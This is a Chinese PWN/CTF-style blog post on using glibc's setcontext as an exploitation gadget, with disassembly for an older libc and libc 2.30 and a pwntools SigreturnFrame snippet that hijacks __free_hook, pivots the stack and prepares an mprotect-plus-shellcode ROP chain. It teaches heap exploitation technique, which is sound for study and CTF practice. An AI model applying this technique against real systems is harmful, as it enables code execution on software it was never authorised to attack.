再次看setcontext在PWN中的利用

August 5, 2020 PWN 访问: 292 次

低版本LIBC

通常情况下是通过堆上的漏洞,来把__free_hook修改为setcontext+53。
setcontext汇编源码:

pwndbg> disassemble setcontext
Dump of assembler code for function setcontext:
   0x00007ffff7808b50 <+0>: push   rdi
   0x00007ffff7808b51 <+1>: lea    rsi,[rdi+0x128]
   0x00007ffff7808b58 <+8>: xor    edx,edx
   0x00007ffff7808b5a <+10>:    mov    edi,0x2
   0x00007ffff7808b5f <+15>:    mov    r10d,0x8
   0x00007ffff7808b65 <+21>:    mov    eax,0xe
   0x00007ffff7808b6a <+26>:    syscall 
   0x00007ffff7808b6c <+28>:    pop    rdi
   0x00007ffff7808b6d <+29>:    cmp    rax,0xfffffffffffff001
   0x00007ffff7808b73 <+35>:    jae    0x7ffff7808bd0 <setcontext+128>
   0x00007ffff7808b75 <+37>:    mov    rcx,QWORD PTR [rdi+0xe0]
   0x00007ffff7808b7c <+44>:    fldenv [rcx]
   0x00007ffff7808b7e <+46>:    ldmxcsr DWORD PTR [rdi+0x1c0]
   0x00007ffff7808b85 <+53>:    mov    rsp,QWORD PTR [rdi+0xa0]
   0x00007ffff7808b8c <+60>:    mov    rbx,QWORD PTR [rdi+0x80]
   0x00007ffff7808b93 <+67>:    mov    rbp,QWORD PTR [rdi+0x78]
   0x00007ffff7808b97 <+71>:    mov    r12,QWORD PTR [rdi+0x48]
   0x00007ffff7808b9b <+75>:    mov    r13,QWORD PTR [rdi+0x50]
   0x00007ffff7808b9f <+79>:    mov    r14,QWORD PTR [rdi+0x58]
   0x00007ffff7808ba3 <+83>:    mov    r15,QWORD PTR [rdi+0x60]
   0x00007ffff7808ba7 <+87>:    mov    rcx,QWORD PTR [rdi+0xa8]
   0x00007ffff7808bae <+94>:    push   rcx
   0x00007ffff7808baf <+95>:    mov    rsi,QWORD PTR [rdi+0x70]
   0x00007ffff7808bb3 <+99>:    mov    rdx,QWORD PTR [rdi+0x88]
   0x00007ffff7808bba <+106>:   mov    rcx,QWORD PTR [rdi+0x98]
   0x00007ffff7808bc1 <+113>:   mov    r8,QWORD PTR [rdi+0x28]
   0x00007ffff7808bc5 <+117>:   mov    r9,QWORD PTR [rdi+0x30]
   0x00007ffff7808bc9 <+121>:   mov    rdi,QWORD PTR [rdi+0x68]
   0x00007ffff7808bcd <+125>:   xor    eax,eax
   0x00007ffff7808bcf <+127>:   ret    
   0x00007ffff7808bd0 <+128>:   mov    rcx,QWORD PTR [rip+0x37c2a1]        # 0x7ffff7b84e78
   0x00007ffff7808bd7 <+135>:   neg    eax
   0x00007ffff7808bd9 <+137>:   mov    DWORD PTR fs:[rcx],eax
   0x00007ffff7808bdc <+140>:   or     rax,0xffffffffffffffff
   0x00007ffff7808be0 <+144>:   ret    
End of assembler dump.

为了使攻击更稳定,所以直接把程序流劫持到setcontext+53,这里的话和SROP是一样的,可以通过pwntools模块快速生成payload,如下所示

frame = SigreturnFrame()            # pwntools frame; its slot layout matches the offsets setcontext+53 reads from the context (rsp from +0xa0, return address pushed from +0xa8 in the listing above)
frame.rdi = 0
frame.rsi = new_area                # new_area: address of the buffer the ROP chain / shellcode is later written to (defined elsewhere in the original script)
frame.rdx = 0x2000
frame.rsp = new_area                # stack is switched to new_area, so the `ret` at the end of the gadget continues from data placed there
frame.rip = libc_base + 0x00000000000bc375 # syscall; ret gadget; the offset is specific to the author's libc build and libc_base is computed elsewhere

然后输入我们的ROP和shellcode在new_area,ROP的操作是先利用mprotect把new_area申请成可执行的段,然后执行shellcode即可

高版本LIBC(2.30)

setcontext(注意此版本在+32处是pop rdx,之后所有寄存器都从rdx偏移加载,而不是低版本中的rdi;另外在+95处多了对fs:0x48的shadow stack标志检查):

pwndbg> disassemble setcontext 
Dump of assembler code for function setcontext:
   0x0000000000058000 <+0>: repz nop edx
   0x0000000000058004 <+4>: push   rdi
   0x0000000000058005 <+5>: lea    rsi,[rdi+0x128]
   0x000000000005800c <+12>:    xor    edx,edx
   0x000000000005800e <+14>:    mov    edi,0x2
   0x0000000000058013 <+19>:    mov    r10d,0x8
   0x0000000000058019 <+25>:    mov    eax,0xe
   0x000000000005801e <+30>:    syscall 
   0x0000000000058020 <+32>:    pop    rdx
   0x0000000000058021 <+33>:    cmp    rax,0xfffffffffffff001
   0x0000000000058027 <+39>:    jae    0x5814f <setcontext+335>
   0x000000000005802d <+45>:    mov    rcx,QWORD PTR [rdx+0xe0]
   0x0000000000058034 <+52>:    fldenv [rcx]
   0x0000000000058036 <+54>:    ldmxcsr DWORD PTR [rdx+0x1c0]
   0x000000000005803d <+61>:    mov    rsp,QWORD PTR [rdx+0xa0]
   0x0000000000058044 <+68>:    mov    rbx,QWORD PTR [rdx+0x80]
   0x000000000005804b <+75>:    mov    rbp,QWORD PTR [rdx+0x78]
   0x000000000005804f <+79>:    mov    r12,QWORD PTR [rdx+0x48]
   0x0000000000058053 <+83>:    mov    r13,QWORD PTR [rdx+0x50]
   0x0000000000058057 <+87>:    mov    r14,QWORD PTR [rdx+0x58]
   0x000000000005805b <+91>:    mov    r15,QWORD PTR [rdx+0x60]
   0x000000000005805f <+95>:    test   DWORD PTR fs:0x48,0x2
   0x000000000005806b <+107>:   je     0x58126 <setcontext+294>
   0x0000000000058071 <+113>:   mov    rsi,QWORD PTR [rdx+0x3a8]
   0x0000000000058078 <+120>:   mov    rdi,rsi
   0x000000000005807b <+123>:   mov    rcx,QWORD PTR [rdx+0x3b0]
   0x0000000000058082 <+130>:   cmp    rcx,QWORD PTR fs:0x78
   0x000000000005808b <+139>:   je     0x580c5 <setcontext+197>
   0x000000000005808d <+141>:   mov    rax,QWORD PTR [rsi-0x8]
   0x0000000000058091 <+145>:   and    rax,0xfffffffffffffff8
   0x0000000000058095 <+149>:   cmp    rax,rsi
   0x0000000000058098 <+152>:   je     0x580a0 <setcontext+160>
   0x000000000005809a <+154>:   sub    rsi,0x8
   0x000000000005809e <+158>:   jmp    0x5808d <setcontext+141>
   0x00000000000580a0 <+160>:   mov    rax,0x1
   0x00000000000580a7 <+167>:   repz rex.W lfence 
   0x00000000000580ac <+172>:   repz (bad) 
   0x00000000000580af <+175>:   outs   dx,BYTE PTR ds:[rsi]
   0x00000000000580b0 <+176>:   clc    
   0x00000000000580b1 <+177>:   repz (bad) 
   0x00000000000580b4 <+180>:   (bad)  
   0x00000000000580b5 <+181>:   mov    rax,QWORD PTR [rdx+0x3b0]
   0x00000000000580bc <+188>:   mov    QWORD PTR fs:0x78,rax
   0x00000000000580c5 <+197>:   repz nop rcx
   0x00000000000580ca <+202>:   sub    rcx,rdi
   0x00000000000580cd <+205>:   je     0x580ec <setcontext+236>
   0x00000000000580cf <+207>:   neg    rcx
   0x00000000000580d2 <+210>:   shr    rcx,0x3
   0x00000000000580d6 <+214>:   mov    esi,0xff
   0x00000000000580db <+219>:   cmp    rcx,rsi
   0x00000000000580de <+222>:   cmovb  rsi,rcx
   0x00000000000580e2 <+226>:   repz rex.W (bad) 
   0x00000000000580e6 <+230>:   out    dx,al
   0x00000000000580e7 <+231>:   sub    rcx,rsi
   0x00000000000580ea <+234>:   ja     0x580db <setcontext+219>
   0x00000000000580ec <+236>:   mov    rsi,QWORD PTR [rdx+0x70]
   0x00000000000580f0 <+240>:   mov    rdi,QWORD PTR [rdx+0x68]
   0x00000000000580f4 <+244>:   mov    rcx,QWORD PTR [rdx+0x98]
   0x00000000000580fb <+251>:   mov    r8,QWORD PTR [rdx+0x28]
   0x00000000000580ff <+255>:   mov    r9,QWORD PTR [rdx+0x30]
   0x0000000000058103 <+259>:   mov    r10,QWORD PTR [rdx+0xa8]
   0x000000000005810a <+266>:   mov    rdx,QWORD PTR [rdx+0x88]
   0x0000000000058111 <+273>:   repz nop rax
   0x0000000000058116 <+278>:   cmp    r10,QWORD PTR [rax]
   0x0000000000058119 <+281>:   mov    eax,0x0
   0x000000000005811e <+286>:   jne    0x58123 <setcontext+291>
   0x0000000000058120 <+288>:   push   r10
   0x0000000000058122 <+290>:   ret    
   0x0000000000058123 <+291>:   jmp    r10
   0x0000000000058126 <+294>:   mov    rcx,QWORD PTR [rdx+0xa8]
   0x000000000005812d <+301>:   push   rcx
   0x000000000005812e <+302>:   mov    rsi,QWORD PTR [rdx+0x70]
   0x0000000000058132 <+306>:   mov    rdi,QWORD PTR [rdx+0x68]
   0x0000000000058136 <+310>:   mov    rcx,QWORD PTR [rdx+0x98]
   0x000000000005813d <+317>:   mov    r8,QWORD PTR [rdx+0x28]
   0x0000000000058141 <+321>:   mov    r9,QWORD PTR [rdx+0x30]
   0x0000000000058145 <+325>:   mov    rdx,QWORD PTR [rdx+0x88]
   0x000000000005814c <+332>:   xor    eax,eax
   0x000000000005814e <+334>:   ret    
   0x000000000005814f <+335>:   mov    rcx,QWORD PTR [rip+0x191d1a]        # 0x1e9e70
   0x0000000000058156 <+342>:   neg    eax
   0x0000000000058158 <+344>:   mov    DWORD PTR fs:[rcx],eax
   0x000000000005815b <+347>:   or     rax,0xffffffffffffffff
   0x000000000005815f <+351>:   ret    
End of assembler dump.
